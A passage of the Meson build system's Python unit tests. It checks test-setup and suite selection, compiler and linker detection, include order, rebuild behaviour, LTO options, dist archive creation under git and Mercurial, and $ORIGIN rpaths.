self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
# Setup that does not define a wrapper works with --wrapper
self._run(self.mtest_command + ['--setup=timeout', '--wrapper', shutil.which('valgrind')])
# Setup that skips test works
self._run(self.mtest_command + ['--setup=good'])
with open(os.path.join(self.logdir, 'testlog-good.txt'), encoding='utf-8') as f:
exclude_suites_log = f.read()
self.assertFalse('buggy' in exclude_suites_log)
# --suite overrides add_test_setup(xclude_suites)
self._run(self.mtest_command + ['--setup=good', '--suite', 'buggy'])
with open(os.path.join(self.logdir, 'testlog-good.txt'), encoding='utf-8') as f:
include_suites_log = f.read()
self.assertTrue('buggy' in include_suites_log)
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt'), encoding='utf-8') as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt'), encoding='utf-8') as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt'), encoding='utf-8') as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '129 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ):
raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2')
testdir = os.path.join(self.common_test_dir, '130 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somfxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# Need to run the build so the private dir is created.
self.build()
pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], "-I" + privdir)
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
pdirs = glob(os.path.join(self.builddir, 'somefxe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], '-I' + privdir)
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, f'detect_{lang}_compiler')(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError(f'Unknown compiler {evalue!r}')
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, f'detect_{lang}_compiler')(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_sunos():
self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl. This can be either an
# ld-like linker of link.exe-like linker (usually the
# former for msys2, the latter otherwise)
self.assertIsInstance(cc.linker, (mesonbuild.linkers.MSVCDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
os.environ[evar] = ' '.join(quote_arg(w) for w in wrappercc)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
os.environ['AR'] = ' '.join(quote_arg(w) for w in wrapperlinker)
# Need a new env to re-run environment loading
env = get_fake_env(testdir, self.builddir, self.prefix)
wcc = getattr(env, f'detect_{lang}_compiler')(MachineChoice.HOST)
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '133 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '132 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = f'-D{define}="{value}"'
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'
self.init(testdir, extra_args=[f'-D{define}={value}'], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '109 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
# Changing mtime of libefile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '19 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '57 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '90 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
@skip_if_not_base_option('b_lto_threads')
def test_lto_threads(self):
testdir = os.path.join(self.common_test_dir, '6 linkshared')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
extra_args: T.List[str] = []
if cc.get_id() == 'clang':
if is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
else:
extra_args.append('-D_cargs=-Werror=unused-command-line-argument')
self.init(testdir, extra_args=['-Db_lto=true', '-Db_lto_threads=8'] + extra_args)
self.build()
self.run_tests()
expected = set(cc.get_lto_compile_args(threads=8))
targets = self.introspect('--targets')
# This assumes all of the targets support lto
for t in targets:
for s in t['target_sources']:
for e in expected:
self.assertIn(e, s['parameters'])
@skip_if_not_base_option('b_lto_mode')
@skip_if_not_base_option('b_lto_threads')
def test_lto_mode(self):
testdir = os.path.join(self.common_test_dir, '6 linkshared')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() != 'clang':
raise unittest.SkipTest('Only clang currently supports thinLTO')
if cc.linker.id not in {'ld.lld', 'ld.gold', 'ld64', 'lld-link'}:
raise unittest.SkipTest('thinLTO requires ld.lld, ld.gold, ld64, or lld-link')
elif is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args=['-Db_lto=true', '-Db_lto_mode=thin', '-Db_lto_threads=8', '-Dc_args=-Werror=unused-command-line-argument'])
self.build()
self.run_tests()
expected = set(cc.get_lto_compile_args(threads=8, mode='thin'))
targets = self.introspect('--targets')
# This assumes all of the targets support lto
for t in targets:
for s in t['target_sources']:
self.assertTrue(expected.issubset(set(s['parameters'])), f'Incorrect values for {t["name"]}')
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init, _git_add_all)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def has_working_hg(self):
if not shutil.which('hg'):
return False
try:
# This check should not be necessary, but
# CI under macOS passes the above test even
# though Mercurial is not installed.
if subprocess.call(['hg', '--version'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
return False
return True
except FileNotFoundError:
return False
def test_dist_hg(self):
if not self.has_working_hg():
raise unittest.SkipTest('Mercurial not found or broken.')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
self.new_builddir()
self.init(project_dir, extra_args=['-Dsub:broken_dist_script=false'])
self._run(self.meson_command + ['dist', '--include-subprojects'], workdir=self.builddir)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write(f"project('{name}', version: '1.0')")
return path
def dist_impl(self, vcs_init, vcs_add_all=None, include_subprojects=True):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write(textwrap.dedent('''\
project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
subproject('samerepo', required : false)
'''))
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write(textwrap.dedent('''\
#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
'''))
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
gz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.gz')
gz_checksumfile = gz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
if vcs_add_all:
vcs_add_all(self.create_dummy_subproject(project_dir, 'samerepo'))
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(gz_distfile)
self.assertPathDoesNotExist(gz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'gztar'],
workdir=self.builddir)
self.assertPathExists(gz_distfile)
self.assertPathExists(gz_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
os.remove(xz_distfile)
os.remove(xz_checksumfile)
os.remove(gz_distfile)
os.remove(gz_checksumfile)
os.remove(zip_distfile)
os.remove(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'xztar,gztar,zip'],
workdir=self.builddir)
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathExists(gz_distfile)
self.assertPathExists(gz_checksumfile)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
# Verify that without --include-subprojects we have files from
# the main project and also files from subprojects part of the
# main vcs repository.
z = zipfile.ZipFile(zip_distfile)
expected = ['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']
if vcs_add_all:
expected += ['disttest-1.4.3/subprojects/',
'disttest-1.4.3/subprojects/samerepo/',
'disttest-1.4.3/subprojects/samerepo/meson.build']
self.assertEqual(sorted(expected),
sorted(z.namelist()))
# Verify that with --include-subprojects we now also have files
# from tarball and separate vcs subprojects. But not files from
# unused subprojects.
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
expected += ['disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/vcssub/meson.build']
self.assertEqual(sorted(expected),
sorted(z.namelist()))
if vcs_add_all:
# Verify we can distribute separately subprojects in the same vcs
# repository as the main project.
subproject_dir = os.path.join(project_dir, 'subprojects', 'samerepo')
self.new_builddir()
self.init(subproject_dir)
self.build('dist')
xz_distfile = os.path.join(self.distdir, 'samerepo-1.0.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
tar = tarfile.open(xz_distfile, "r:xz")
self.assertEqual(sorted(['samerepo-1.0',
'samerepo-1.0/meson.build']),
sorted([i.name for i in tar]))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '39 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, f'Rpath could not be determined for {each}.')
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
